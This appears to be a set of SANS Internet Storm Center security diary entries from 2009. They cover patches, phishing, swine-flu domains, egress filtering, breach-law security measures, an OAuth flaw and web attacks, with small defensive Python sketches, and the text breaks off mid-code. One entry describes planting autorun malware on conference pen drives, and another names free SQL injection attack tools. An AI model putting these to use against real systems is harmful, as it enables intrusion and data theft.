ARIN Notification Concerning IPv6

One of our readers, Mike, pointed out a certified letter that his organization received from ARIN. The letter was sent to CEOs and company executives over the past two weeks. It warns that, at the current rate of depletion, new allocations of IPv4 address blocks will no longer be available in about two years. It advises organizations needing IP space to do the following:

1. You should begin planning for IPv6 adoption if you are not doing so already. One of the most important steps is to make your organization’s publicly accessible resources (e.g. external web servers and e-mail servers) available via IPv6 as soon as possible. This will maintain your Internet connectivity during this transition. For more information on IPv6, please refer to ARIN’s online IPv6 Information Center.

2. ARIN is taking additional steps to ensure the legitimacy of all IPv4 address space requests. Beginning on or after 18 May 2009, ARIN will require applications for IPv4 address space to include an attestation of accuracy from an organizational officer. This ensures that organizations submitting legitimate requests based on documented need will have ongoing access to IPv4 address space to the maximum extent possible.
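As a rough first check on item 1, you can see whether a public host name already resolves to an IPv6 address. The Python sketch below is our own illustration, not something from ARIN's letter. It only checks name resolution (an AAAA record or an IPv6 literal) and does not prove that the web or mail service actually answers over IPv6.

```python
import socket


def has_ipv6_address(host: str) -> bool:
    """Return True if `host` resolves to at least one IPv6 address.

    This only checks name resolution (an AAAA record or an IPv6 literal);
    it does not test whether the service behind the name answers over IPv6.
    """
    try:
        return len(socket.getaddrinfo(host, None, socket.AF_INET6)) > 0
    except socket.gaierror:
        # No IPv6 address for this name, or the lookup itself failed.
        return False
```

For example, `has_ipv6_address("www.example.com")` (substitute your own public web and mail server names) returns True only if that name has an IPv6 address; a follow-up test from an IPv6-connected host is still needed to confirm the service works.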

Marcus H. Sachs

Director, SANS Internet Storm Center

Microsoft Revises 08-069, 08-076, and 09-012

Microsoft has issued major revisions to the following security bulletins:

* MS09-012 - Important

* MS08-076 - Important

* MS08-069 - Critical

Details about each revision are at the bottom of the respective bulletin. These are not "big deal" revisions, but they are worth reviewing in case they apply to your system or situation.

Marcus H. Sachs

Director, SANS Internet Storm Center

Office 2007 SP2 is released as well

Several people have written in to tell us that, after reading my article about the IE8 update, they also found Office 2007 SP2 waiting for them as a "critical" update.

Be sure to update Office at the same time! It's just good general practice to keep your software up to date. But our readers probably know that one already ;).

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler

Facebook Phishing attack -- Don't go to fbaction.net

Matthew writes in to tell us about an article posted over on TechCrunch about a phishing attack that is "underway at Facebook."

This phishing attack is an email with the subject "Hello". (First off, if you receive an email whose entire subject is "Hello", immediately suspect it is nonsense. I used to get a ton of these at one point, because I belonged to a website where people could post via a webpage that had no spam protection, so the most common subject was "Hello". It got so bad that I used to send all emails with the subject "Hello" straight to /dev/null. (Yes, it was *that bad*.) Anyway, I digress.)

The phishing email will read something like "YOURFRIEND sent you a message", with a link to click on to read what your "friend" wrote.

The link instead sends you to fbaction.net (don't go there), where the page looks like the Facebook login page and they are hoping you will type in your credentials. Fairly simple phish, so keep your eyes open.
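Part of "keeping your eyes open" is checking where a link really points before you click it. A minimal Python sketch of that check, assuming (for this illustration) that genuine Facebook links use facebook.com or one of its subdomains. It looks at the parsed host name rather than at whether the string merely contains "facebook", which is how look-alike hosts slip through.

```python
from urllib.parse import urlsplit

# Assumption for this sketch: genuine links use facebook.com or a subdomain of it.
TRUSTED_DOMAIN = "facebook.com"


def is_facebook_link(url: str) -> bool:
    """True only if the link's host is facebook.com or a subdomain of it."""
    # .hostname drops any "user@" prefix and is already lower-cased.
    host = (urlsplit(url).hostname or "").rstrip(".")
    return host == TRUSTED_DOMAIN or host.endswith("." + TRUSTED_DOMAIN)


for link in ("http://www.facebook.com/home.php",
             "http://fbaction.net/",
             "http://www.facebook.com.fbaction.net/"):
    print(link, is_facebook_link(link))  # True, then False, then False
```

The third link shows why a simple "contains facebook.com" test is not enough: the real host there is under fbaction.net.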

Original article here. Thanks Matthew!

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler

Microsoft is turning off Auto-Run!

Well, kinda.

Yesterday morning, Microsoft announced through their MSRC that they are going to further protect Windows customers by disabling the Auto-Run "feature" in Windows for everything *except* optical media. (Because CD-ROMs can't be written to, according to them. I see nothing about CD-R and CD-RW specifically.)

I feel this is a good idea. There has always been malware that likes to attach itself to things like thumb drives and other removable media such as diskettes. (Does anyone use those anymore? ;) ) Every Windows environment I've worked in during my career has had Auto-Run disabled, so this is just good security practice by now.

For more details check out Microsoft's articles on the subject here and here.

Thanks to the reader who wrote in about this.

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler

Two Adobe 0-day vulnerabilities

Two 0-day vulnerabilities in Adobe Acrobat were announced today, and all current versions are vulnerable. One exploits the annotation function and the other exploits the custom Dictionary function. Both are buffer overflows in Acrobat's JavaScript engine, and both can be mitigated by disabling JavaScript in Adobe Acrobat.

Since exploits for these vulnerabilities on the Linux platform have been posted to the Internet, we can only guess that someone will soon make them work on Windows and use them to spread botnet agents.

http://blogs.adobe.com/psirt/2009/04/update_on_adobe_reader_issue.html

Internet Explorer 8, now being pushed

If you go to the "Windows Update..." feature today, you will see that IE8 is now available as a "critical" update for your Microsoft OS.

Several of the Handlers, myself included, believe that this is a good thing. We are all for replacing the older IE6 and IE7, and we hope this leads to a more standards-based World Wide Web, instead of websites having to code to the browser.

Time to update your IE installation!!

-- Joel Esler

Updated List of Domains - Swineflu related

F-Secure has just published a list of SwineFlu related domains. We have not had a chance to check them all out yet, so we are not sure whether any of them are malicious. Here is the link to the published list:

www.f-secure.com/weblog/archives/swineflu_domains.txt

We cannot emphasize enough the need to use extreme caution when accessing these sites or clicking on links in emails related to the swine flu. Some of these sites may be serving up swine flu for your computer instead of for you. Others may once again be trying to take money from kind-hearted souls who just want to help. It is important that we remain vigilant, online and off.

RSA Conference Social Security Awards

It is confirmed and published that we here at the SANS Institute Internet Storm Center have won the Best Technical Blog award, and our friends over at PaulDotCom won the Best Podcast award.

Great job everyone.

We here at the Internet Storm Center thank our readers for their continued support and input. We enjoy interacting with our readers at SANS events and in our inboxes. Without you, our readers and faithful followers, this award would not have been possible. Also, many thanks to the SANS Institute and to Stephen and Kathy for putting their trust in us and making this available. Without the folks at the SANS Institute and their support, none of this would be possible.

To my fellow Handlers I say: what a great group to be associated with. You each deserve an award!

Firefox gets another update

Didn't I just post about Firefox getting updated? Well, I'm not complaining, good for Mozilla.

It looks like a memory corruption bug was introduced in 3.0.9. It affected users of HTML Validator (a Firefox add-on) in particular, and upon further review of the situation, Mozilla found the memory corruption bug. Unfortunately (as far as I can tell) there is no button in Firefox that says "Go check for updates... right now!", at least in the OS X version.

Anyway, here's the security announcement from Mozilla. Time to update, again.

-- Joel Esler

Swine Flu (Mexican Flu) related domains

This is a first cut of a list of "Swine Flu" related domains. In Europe, this flu is usually referred to as "Mexican Flu". Right now, none of the domains are spreading malware or running donation scams. One appears to sell questionable pharmaceuticals (symptoms-of-swine-flu.com). The rest are either just parked, or offer some kind of information and may try to make some money with Google ads. A lot of the "information" is minimal, incomplete or hype, but classifying it further is beyond a quick scan of the content.

Please let us know if you come across anything of interest (use our contact page).

The list comes from Bojan's passive DNS system (he will talk about this at SANSFIRE in June... don't miss it).

- h1n1swineflu.com: links to birdflu site (google ads)
- human-swine-influenza.com: under construction
- humanswineflu.com: same as h1n1swineflu.com
- pandemicswineflu.com: same as h1n1swineflu.com
- swine-flu-info.co.nz: info site (google ads)
- swine-flu-information.com: info site (google ads)
- swine-flu-news.com: info site (google ads)
- swine-flu-symptoms.com: info site
- swine-flu-symptoms.info: info site (link to google ads)
- swine-flu-vaccine.sdfgdfd.us: junk search / link site
- swine-flu.info: godaddy parked
- swine-flu.net: godaddy parked
- swine-flu.org: godaddy parked
- swine-influenza-news.org: info site (google ads)
- swineflu-symptoms.com: godaddy parked
- swineflu.biz: same as h1n1swineflu.com
- swineflu.info: same as h1n1swineflu.com
- swineflu.us: same as h1n1swineflu.com
- swineflubase.com: under construction (wordpress site)
- swineflublog.com: info site (google ads)
- swinefludrugs.com: same as h1n1swineflu.com
- swinefluforum.com: swineflu.org, forum
- swineflumaps.com: info site (google ads)
- swineflupost.com: under construction
- swinefluprecaution.com: godaddy parked
- swinefluprecautions.com: godaddy parked
- swineflusymptoms.net: directory index / under construction
- swineflusymptoms.us: info site / onclose ads
- swineflusymtoms.com: unrelated info / ebay ads / amazon ads
- swineflusyptoms.com: godaddy parked
- swineflusyptoms.net: godaddy parked
- swineflutv.com: same as h1n1swineflu.com
- swinefluvaccine.info: godaddy parked
- swinefluvaccines.com: same as h1n1swineflu.com
- swinefluvirussymptoms.com: godaddy parked
- swineinfluenzasymptoms.com: junk site / parked
- symptoms-of-swine-flu.com: pharma ad, tamiflu UK (legit?)
- symptoms-of-swine-flu.info: info site (google ads)
- theswineflu.com: parked/ads
- theswineflusymptoms.com: info site (google ads)
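Several entries in this list (swineflusymtoms.com, swineflusyptoms.com and swineflusyptoms.net) are one-letter misspellings of "swineflusymptoms". As a hypothetical illustration, and not a description of how Bojan's passive DNS system works, here is a Python sketch that flags such omission typos in a list of observed domains. The keyword and the sample domains are taken from the list above.

```python
def omission_typos(word: str) -> set:
    """All strings formed by dropping exactly one character from `word`."""
    return {word[:i] + word[i + 1:] for i in range(len(word))}


def flag_typo_domains(domains, keyword):
    """Return domains whose first label is `keyword` with one character missing."""
    variants = omission_typos(keyword)
    return [d for d in domains if d.split(".")[0] in variants]


observed = [
    "swineflusymptoms.net",
    "swineflusymtoms.com",
    "swineflusyptoms.com",
    "swineflusyptoms.net",
    "swine-flu.org",
]
print(flag_typo_domains(observed, "swineflusymptoms"))
# ['swineflusymtoms.com', 'swineflusyptoms.com', 'swineflusyptoms.net']
```

Omission is only one kind of typo; swapped or doubled letters would need their own variant generators.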

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute Follow johullrich on twitter

Pandemic Preparation - Swine Flu

The current WHO phase of pandemic alert is 3/6 (1200 EDT 27/04/2009)

Lots of news about the Swine Flu outbreak in Mexico. Right now, cases are reported in the US, Canada, New Zealand, Hong Kong and Spain. We have covered pandemic preparedness before, so let me just list a few pointers and a couple of highlights:

- don't count on locking up your NOC staff in the NOC. They want to be home with family. Be ready to operate in "lights out" mode remotely with minimal or no staff.

- everybody will try to do the same thing. Cell phone data connectivity and broadband internet connections may be overloaded at times. Panic breeds inefficiency.

- don't panic. Try to find solid news reports and don't fall for the hype some news media will spread to attract viewers. Stick to reputable sources (www.cdc.gov comes to mind).

So far, about 80 people have died from it. The best number I could find for people infected stated that "more than 1000 had symptoms". Most of the US infections were among high school children, and all of them appear to be fine so far.

Stephen Northcutt maintains a nice page with links to news reports and such: http://www.sans.edu/resources/leadershiplab/pandemic_watch2009.php

Quick update with some reader input:

- travel to / from Mexico is still unrestricted, but discouraged. Many airlines will waive rebooking fees.

- Texas announced that it may put restrictions on travel out of Texas in place if more cases are found there.

Travel restrictions are probably the most likely impact in the short term. Make sure to double check any travel plans.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute follow johullrich on twitter

Odd DNS Resolution for Google via OpenDNS

One of our readers (Deoscoidy) from Puerto Rico reported issues reaching Google earlier today. Instead of being directed to Google, he was redirected to an error page hosted with the free web service provider atspace.com. Pages like this are known to be used for malware. Shortly after he reported it, the problem fixed itself for him. I have only been able to reproduce part of the problem so far.

He found that the redirect was in part due to the name resolution done by OpenDNS. It looks like OpenDNS users receive a different response for "www.google.com" than they get by resolving it directly:

With OpenDNS (dig @208.67.222.222 www.google.com):

    ;; ANSWER SECTION:
    www.google.com. 30 IN CNAME google.navigation.opendns.com.
    google.navigation.opendns.com. 30 IN A 208.69.32.231
    google.navigation.opendns.com. 30 IN A 208.69.32.230

Without OpenDNS (dig www.google.com):

    ;; ANSWER SECTION:
    www.google.com. 336708 IN CNAME www.l.google.com.
    www.l.google.com. 148 IN A 74.125.93.104
    www.l.google.com. 148 IN A 74.125.93.147
    www.l.google.com. 148 IN A 74.125.93.99
    www.l.google.com. 148 IN A 74.125.93.103

The 208.69.32.0/21 block is owned by OpenDNS. So the information returned by OpenDNS is not necessarily malicious, and may just be part of Google's intricate load-balancing scheme (you will likely get very different IP addresses if you run the second query yourself).

The response returned from these servers looks like an authentic response from Google. However, it is possible that some of the country-level redirection was broken earlier. Right now, everything seems to be fine. If you experience similar issues, please let us know.
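If you want to check your own resolver's answers, the Python sketch below pulls the A records out of dig's answer section and tests whether they all fall inside 208.69.32.0/21, the OpenDNS block mentioned above. It is only an illustration that handles the simple one-record-per-line format shown in this diary, not a general DNS parser; the sample strings are the answers quoted above.

```python
import ipaddress

# The OpenDNS-owned block mentioned in the text.
OPENDNS_NET = ipaddress.ip_network("208.69.32.0/21")


def a_records(answer_section: str):
    """Extract the addresses from A records in dig's ANSWER SECTION text."""
    addrs = []
    for line in answer_section.splitlines():
        fields = line.split()
        # Record lines look like: <name> <ttl> IN <type> <data>
        if len(fields) == 5 and fields[2] == "IN" and fields[3] == "A":
            addrs.append(ipaddress.ip_address(fields[4]))
    return addrs


def answered_from_opendns_block(answer_section: str) -> bool:
    """True if there is at least one A record and every one lies in OPENDNS_NET."""
    addrs = a_records(answer_section)
    return bool(addrs) and all(addr in OPENDNS_NET for addr in addrs)


with_opendns = """
www.google.com. 30 IN CNAME google.navigation.opendns.com.
google.navigation.opendns.com. 30 IN A 208.69.32.231
google.navigation.opendns.com. 30 IN A 208.69.32.230
"""
without_opendns = """
www.google.com. 336708 IN CNAME www.l.google.com.
www.l.google.com. 148 IN A 74.125.93.104
www.l.google.com. 148 IN A 74.125.93.147
"""
print(answered_from_opendns_block(with_opendns))     # True
print(answered_from_opendns_block(without_opendns))  # False
```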

Update

Chris and Nicholas confirm that OpenDNS has been doing this "MiM" on Google for a while now. A user may disable this "feature", but will lose the malware protection provided by OpenDNS as a result.

------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute Twitter: johullrich

To filter or not to filter?

A reader wrote in today asking about egress filtering. It seemed like a perfect topic, since it tends to spark emotions depending on your role in your organization. I've heard arguments from both sides. Generally the lines are drawn between the Network Group, who deem it too hard to do (i.e. lots of ACLs and/or rules, etc.), and the Security Group, who say it needs to be done. Here are some questions to consider with egress filtering:

1. Is it necessary to do egress filtering? The short answer is yes. You cannot defend your company's information and network without doing egress filtering.

2. Where do you need to do egress filtering on your network? This, I think, is one of the real questions. Most people think of the one point of the network that allows access to the Internet, such as the DMZ. But what about internal "egress" filtering? If your network is divided up by business line and there are key areas such as finance or code repositories, would you want to do egress filtering there? I would submit that the answer is yes. The information may not be going to the Internet, but to an insider threat. Or a compromised box may be collecting the information internally on your network, and that box has access to the Internet. You would hope that your egress filtering would catch that, but it really depends on the kind of filtering you're doing.

3. What devices can filter for you? The concept of egress filtering has really broadened over the years, and technology has driven that. Still, many people associate egress filtering with just routers and firewalls. But many other tools have egress filtering capabilities, such as web proxies and email gateways, and these are actually the right tools for filtering in many cases. ACLs and firewall rules serve their purpose, but in most cases they are limited. Firewalls, for example, allow you to create rules that control what traffic can go outbound. But if it's a stateful inspection firewall, its application layer inspection capabilities are very limited. I'm referring to stateful inspection firewalls that allow only limited deep packet inspection for certain protocols such as HTTP. A web proxy can give you far more granular control over your HTTP traffic.

4. Isn't there such a thing as filtering to the point of diminishing returns? Yes, there is. If you are trying to filter everything on every device, you may hit diminishing returns for the amount of work you are creating for yourself. If you have so many ACLs and firewall rules that you don't know what they do, then you have a problem. You may actually be allowing traffic to pass when you thought you were blocking it (depending on the device type and the order in which the ACLs/rules fire). For example, if you depend on your routers to do all your egress filtering, you may be creating more work for yourself. Your routers may be better used to filter traffic at a higher, coarser level, leaving other devices to be the "real" egress enforcers.
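To illustrate the rule-order problem, here is a hypothetical Python model of a first-match ACL. The rule format, addresses and port are made up, and real devices differ in syntax and details such as the implicit deny at the end. The `shadowed` helper flags rules that are completely covered by an earlier rule and therefore never take effect.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass
class Rule:
    action: str              # "permit" or "deny"
    src: str                 # source network in CIDR notation
    dst_port: Optional[int]  # None means "any port"


def evaluate(rules, src: str, dst_port: int, default: str = "deny") -> str:
    """First-match evaluation: the first rule that matches decides."""
    for rule in rules:
        if ip_address(src) in ip_network(rule.src) and rule.dst_port in (None, dst_port):
            return rule.action
    return default


def shadowed(rules):
    """Indexes of rules that can never take effect because an earlier rule covers them."""
    hidden = []
    for j, later in enumerate(rules):
        for earlier in rules[:j]:
            covers_src = ip_network(later.src).subnet_of(ip_network(earlier.src))
            covers_port = earlier.dst_port in (None, later.dst_port)
            if covers_src and covers_port:
                hidden.append(j)
                break
    return hidden


rules = [
    Rule("permit", "10.0.0.0/8", None),  # broad outbound permit added early on
    Rule("deny", "10.1.2.0/24", 25),     # meant to stop one subnet from sending SMTP out
]
print(evaluate(rules, "10.1.2.7", 25))  # permit: the deny rule is never reached
print(shadowed(rules))                   # [1]
```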

The bottom line is that there is no "one size fits all" for egress filtering on your network. You have to look at your network design, know what your network traffic consists of (I can't emphasize that one enough), figure out where you need egress control points on your network and identify which device is best suited for each. If you realize you don't have what you need, add it to your risk management and mitigation plan. I also really like building a traffic flow diagram that helps me see (at a high level) who is allowed to talk to whom, and on what port and protocol. This also helps me determine where I need control points. This is only a high-level discussion of egress filtering. If you have something you do or a tool you like to use, please let us know and we'll update the diary.
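A traffic flow diagram can also be kept in machine-readable form. A minimal Python sketch, assuming made-up zone names and ports: a who-talks-to-whom matrix, plus a check that lists observed flows (for example, summarized from firewall or flow logs) that the matrix does not allow. Each zone pair that carries traffic is a candidate control point.

```python
# Hypothetical zones and flows; replace with what your traffic analysis actually shows.
ALLOWED_FLOWS = {
    ("workstations", "internet"): {("tcp", 80), ("tcp", 443)},
    ("mail_gateway", "internet"): {("tcp", 25)},
    ("workstations", "finance"): {("tcp", 443)},
}


def flow_allowed(src_zone: str, dst_zone: str, proto: str, port: int) -> bool:
    """A flow is allowed only if its zone pair lists this protocol and port."""
    return (proto, port) in ALLOWED_FLOWS.get((src_zone, dst_zone), set())


def violations(observed_flows):
    """Observed (src_zone, dst_zone, proto, port) tuples that the matrix does not allow."""
    return [flow for flow in observed_flows if not flow_allowed(*flow)]


observed = [
    ("workstations", "internet", "tcp", 443),
    ("workstations", "internet", "tcp", 25),  # direct SMTP out, bypassing the mail gateway
    ("finance", "internet", "tcp", 443),      # no egress path defined for finance
]
for flow in violations(observed):
    print("not in flow matrix:", flow)
```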

Did you check your conference goodies?

This year I went to the RSA to have lunch with some friends.

It was nice to get together with some other SANS ISC friends too, such as Johannes, Marc and Lenny.

It was good to see them again. Also, while visiting the expo, something occurred to me. Some booths were giving away pen drives with promotional material. As you can imagine, those booths were always crowded.

To get your pen drive, you just dropped off your business card, picked a pen drive from the pile on the table, and walked away... cool...

I don’t like people scanning my badge or using my business card to send me offers later, so beforehand I went to some other booths, collected a bunch of business cards from sales people (they love to give them away... :) ) and went to the 'pen-drive booth' to get mine... :)

If I had malicious intent, I would go somewhere else, plug in my new pen drive, load some autorun-style malware onto it or fill it with malicious PDFs, and return it to the crowded booth table full of pen drives... And I could do it several times...

An average user would take it, plug it into his computer, happily install whatever is on it, and be p0wned…
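Before a giveaway drive goes anywhere near a production machine, one precaution is to mount it on an isolated system with Auto-Run disabled and look for the two things mentioned above: an autorun file and PDFs. A minimal Python sketch of that inventory step; the file-type list is our assumption and deliberately short, and this is no substitute for an anti-virus scan.

```python
import os

# File types this sketch treats as worth a closer look; extend to suit your environment.
SUSPICIOUS_NAMES = {"autorun.inf"}
SUSPICIOUS_EXTENSIONS = (".pdf",)


def suspicious_files(mount_point: str):
    """Walk a mounted drive and list files to inspect before anything is opened."""
    hits = []
    for root, _dirs, files in os.walk(mount_point):
        for name in files:
            lower = name.lower()
            if lower in SUSPICIOUS_NAMES or lower.endswith(SUSPICIOUS_EXTENSIONS):
                hits.append(os.path.join(root, name))
    return sorted(hits)
```

For example, `suspicious_files("/media/usb0")` (a hypothetical mount point) returns the full paths of any autorun.inf or PDF files, in any letter case, anywhere on the drive.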

-----------------------------------------------------------------

Pedro Bueno ( pbueno // isc. sans. org)

http://twitter.com/besecure

SANS Internet Storm Center Winner of RSA Social Security Award for Best Technical Blog

We've been informed that we have won the Best Technical Blog award (though we'd dispute that we're actually a blog :) ) in this year's RSA Social Security awards. We'd like to thank you not only for nominating us, but for your continued support of our efforts, for reading our work, for contributing to DShield and for sending in information of interest. That said, we aren't done evolving and continuing to improve the services we provide. So:

What can we do to improve our services?

What would you like to see added?

Is there something we are doing that we should stop?

Let us know your feedback!

--

John Bambenek / bambenek \at\ gmail /dot/ com

Data Leak Prevention: Proactive Security Requirements of Breach Notification Laws

I'm beginning to prepare for a talk on Data Leak Prevention that I plan to give at SANSFIRE 09. The talk will cover both the loss of trade secrets and the loss of NPI (covered separately because the risk profiles are different). As part of the research I've been looking at the breach notification laws of the various states (which also seem to be used as models by other countries). My particular interest is in the proactive requirements that the laws seem to imply and exactly what they mean. First, breach notification laws are written to require businesses to report the potential acquisition of NPI (non-public information) by unauthorized entities. They define NPI as, basically, a name plus any of the following (sorry, this is US-centric, but what follows applies anywhere):

- National Identification Number (or, as you may euphemistically refer to it, a Social Security Number)

- Driver's License Number

- Financial Account number (whatever information is required to commit fraud, and in some cases, just the number)

- Medical information

- Health insurance information

To clarify, a financial account number could be a bank account number (with routing number), a credit card number, or a debit card number. Some states require whatever requisite PIN there may be (not applicable to bank account numbers); others require just the financial account number. If that information is compromised, a notification needs to be sent to consumers on a timely basis. This makes sense because the company won't be the victim of the fraud; the consumer will be. So the regulation is efficient because it counteracts the incentive to externalize that cost (a little love for the economists out there who get what I just said). The notification part is pretty straightforward, and that's not what I'm talking about here.

The laws also require both an information security program (undefined) and "reasonable security measures" to prevent the acquisition of NPI data. This part, at least in the law, is almost intentionally "squishy". While it is probably best that legislators don't spell out technical controls in detail in statute, it makes the task of compliance a bit harder. However, a couple of breach notification enforcement actions spell out at least what the FTC and the various state Attorneys General believe "reasonable security measures" include, and it's safe to assume that they will approach future breaches with the same, if not a more stringent, standard. What they appear to define as reasonable security measures are:

- Use of encryption with data at rest and in transit, both within and outside the organization

- Limiting access to wireless networks

- Use of strong passwords (and multiple passwords) for administrators to access systems and networks

- Limiting internal systems' access to the Internet

- Employing measures to detect and prevent unauthorized access

- Conducting security investigations, as appropriate

- Patching systems and updating anti-virus

- Requiring periodic changes to passwords

- Locking accounts after too many failed attempts at logging in

- Not storing credentials in insecure formats (e.g. in the clear in cookies)

- Use of secure transit for credentials (i.e. HTTPS / SSH)

- Forbidding sharing of accounts

- Regular assessment of networks and applications for security vulnerabilities

- Implementing defenses to well known attacks

- Inventory of NPI data stored, on what servers, for what purposes

- Secure deletion of NPI once it is no longer needed

Those seem to be the explicit requirements laid out by the FTC, at least when it enforced breach notification against TJX and Seisint last year. If I were called to testify as to what "reasonable security" was, I would likely include:

- Separation of duties required to access NPI (i.e. the requestor cannot simply look; they need someone from another team)

- All access should be monitored (when feasible)

- Ideally, a separate environment for NPI data repositories

- Strong authentication to access NPI or for systems where NPI access is possible (i.e. controlled "root"/"administrator" access)

- For non-recurring transactions (i.e. one-time), financial account information is redacted once money changes hands

- Anyone accessing the information needs a true need-to-know to get it (i.e. do they really need to see the entire CC number?)
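For the need-to-know point, most staff rarely need more than the last few digits of a card number. A minimal Python sketch of display-time redaction, assuming that showing the last four digits is acceptable in your environment (check what applies to you). It masks only what is displayed; the stored data still needs its own protection.

```python
def mask_account_number(number: str, visible: int = 4) -> str:
    """Replace all but the last `visible` digits with '*', dropping spaces and dashes."""
    digits = [c for c in number if c.isdigit()]
    if len(digits) <= visible:
        # Too short to reveal anything safely: mask every digit.
        return "*" * len(digits)
    return "*" * (len(digits) - visible) + "".join(digits[-visible:])


print(mask_account_number("4111 1111 1111 1111"))  # ************1111
```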

California has published some general guidance here. What are your thoughts? What are reasonable security precautions? Do you have data leak prevention tools, and how are they working for you?

--

John Bambenek

bambenek /at/ gmail \dot\ com

Some trendmicro.com services down

A couple of people have reported that TrendMicro is having network issues, and the following site has been down for many hours today: http://esupport.trendmicro.com

Possible MS09-013 activity

Jack sends us notice that Symantec is alerting on possible MS09-013 activity. This information comes from the Symantec ThreatCon Network Activity Spotlight. Basically, their network monitoring systems are seeing an increase in activity that could be a precursor to an MS09-013 attack, but it could also be aimed at old vulnerabilities from 2002 (in both Apache and IIS). Consider it a reminder to get the recent Microsoft patchset deployed.

OAuth vulnerability

My friend Jason Kendall pointed out to me that OAuth has acknowledged a reported vulnerability. No details on the vulnerability have been announced yet. We do know that Twitter, Yahoo, Google, Netflix and other OAuth providers are all working on researching and mitigating it. We should hear more shortly.

OAuth is an open protocol for API access authorization. It allows users to grant online providers access to specific parts of their data. It is commonly used with OpenID, where OpenID provides the authentication and OAuth then gives access to the user's properties and attributes without handing all the other information to the provider. One site might need to know a user's name and age, while another should only know the user's name and food preference; OAuth allows such selective disclosure.

Update: The details of the vulnerability have now been released. It is similar to a session fixation vulnerability (though it is not session related). The attacker obtains a legitimate request token from one site, then entices a victim to click on a link containing that token. The link brings the victim to a page for approving the site's access to personal information. The attacker can then finish the authorization and gain access to whatever information the victim approved for that site.
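The following Python sketch is a toy model of that flow, not real OAuth code: tokens are random strings and there are no signatures, consumers or callbacks. It shows why a request token that anyone can exchange once it is approved is dangerous, and how tying the exchange to a one-time verifier that reaches only the approving user's side of the flow closes the hole. (OAuth 1.0a later added an `oauth_verifier` parameter for this purpose; the model only mimics that idea.)

```python
import secrets
from typing import Optional


class ToyProvider:
    """Toy OAuth-style provider (hypothetical; no signatures, consumers or callbacks)."""

    def __init__(self, require_verifier: bool):
        self.require_verifier = require_verifier
        self.approved_by = {}  # request token -> user who approved it
        self.verifiers = {}    # request token -> one-time verifier issued on approval

    def issue_request_token(self) -> str:
        return secrets.token_hex(8)

    def approve(self, token: str, user: str) -> Optional[str]:
        """User approves access; in verifier mode only the approver's flow gets the verifier."""
        self.approved_by[token] = user
        if self.require_verifier:
            self.verifiers[token] = secrets.token_hex(8)
            return self.verifiers[token]
        return None

    def exchange(self, token: str, verifier: Optional[str] = None) -> Optional[str]:
        """Trade an approved request token for access to the approver's data."""
        if token not in self.approved_by:
            return None
        if self.require_verifier and verifier != self.verifiers.get(token):
            return None
        return "access:" + self.approved_by[token]


for mode in (False, True):
    provider = ToyProvider(require_verifier=mode)
    token = provider.issue_request_token()  # attacker starts the flow
    provider.approve(token, "victim")       # victim follows the attacker's link and approves
    print(mode, provider.exchange(token))   # attacker tries to finish without the verifier
# False access:victim
# True None
```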

Earthlink is down?

(On Earth Day. Ironic?)

We have been getting a few reports recently of Earthlink (the ISP) having DNS problems and otherwise being "down". We haven't been given much information at this time. However, since we can't even reach Earthlink's website, and "Downforeveryoneorjustme.com" is reporting it's down as well, it appears they are definitely having some problems.

-- Joel Esler

SANS ISC is on Twitter too!

I've posted about this before, and many people started following us after that. However, since the Oprah/Twitter/Ashton Kutcher event (I call the eras "BO" and "AO": Before Oprah and After Oprah), millions of people have joined Twitter and may not know that the ISC has a Twitter name as well.

Feel free to follow us there as well if you are on Twitter.

-- Joel Esler

Bind 10 press release has been issued

According to a press release issued today by the ISC (www.isc.org -- not us -- the DNS people), they are starting work on Bind 10.

There really isn't much information about Bind 10 at this time; however, it does have its own webpage on the ISC.org site.

Check out the page here.

Check out the press release here.

Join the Bind 10 Announcement mailing list here.

-- Joel Esler

Firefox gets an update.

We had several readers write in this morning to let us know of Firefox version 3.0.9 being released.

(Thanks roseman, CJ, Sebenste!)

For a complete linked list of Firefox vulns: http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.9

MFSA 2009-22 Firefox allows Refresh header to redirect to javascript: URIs

MFSA 2009-21 POST data sent to wrong site when saving web page with embedded frame

MFSA 2009-20 Malicious search plugins can inject code into arbitrary sites

MFSA 2009-19 Same-origin violations in XMLHttpRequest and XPCNativeWrapper.toString

MFSA 2009-18 XSS hazard using third-party stylesheets and XBL bindings

MFSA 2009-17 Same-origin violations when Adobe Flash loaded via view-source: scheme

MFSA 2009-16 jar: scheme ignores the content-disposition: header on the inner URI

MFSA 2009-15 URL spoofing with box drawing character

MFSA 2009-14 Crashes with evidence of memory corruption (rv:1.9.0.9)

-- Joel Esler

Web application vulnerabilities

In the last two weeks we have all witnessed a couple of major attacks that exploited web application vulnerabilities. Probably the best example was the Twitter XSS worm, which exploited several (!) XSS vulnerabilities in various parts of Twitter's profile screen. Luckily, the XSS worm was more or less benign, but the author could have done much worse things with it; remember that it had full access to the logged-in user's account.

The second high-profile attack happened yesterday to the New Zealand-based domain registrar Domainz.net. While the details of this attack have not been confirmed, the media is speculating that SQL injection was the root cause of this mass defacement. The attackers supposedly exploited this vulnerability to modify DNS records for some high-profile web sites, such as Sony's and Microsoft's (in New Zealand).

These two attacks show that the overall security of web applications is still far from where we would like it to be. I can confirm this from my own experience: almost every penetration test I have carried out on a web application has identified at least one vulnerability in the classes mentioned above.

Besides various testing tools, there are a couple of attack tools that I've also seen used in the wild: Sqlmap, an automatic SQL injection tool, and the similar Absinthe, a very powerful tool that even allows the attacker to retrieve data from the database. Finally, we have to mention Sqlninja as well, a tool written especially for attacks on Microsoft SQL Server. All of these are available for free on the Internet (they should be the first hit on your favorite search engine).

While these vulnerabilities can be severe, they are also relatively easy to fix, so make sure that all your developers are aware of the fantastic (and free) resources that the folks at OWASP (http://www.owasp.org/) have put up.
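To make the SQL injection fix concrete, here is a minimal Python sketch using the standard-library sqlite3 module (the table and data are made up). The unsafe function pastes user input into the SQL text; the safe one passes it as a bound parameter, the kind of defense OWASP recommends. The same idea applies to any database driver that supports parameterized queries.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory database with a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
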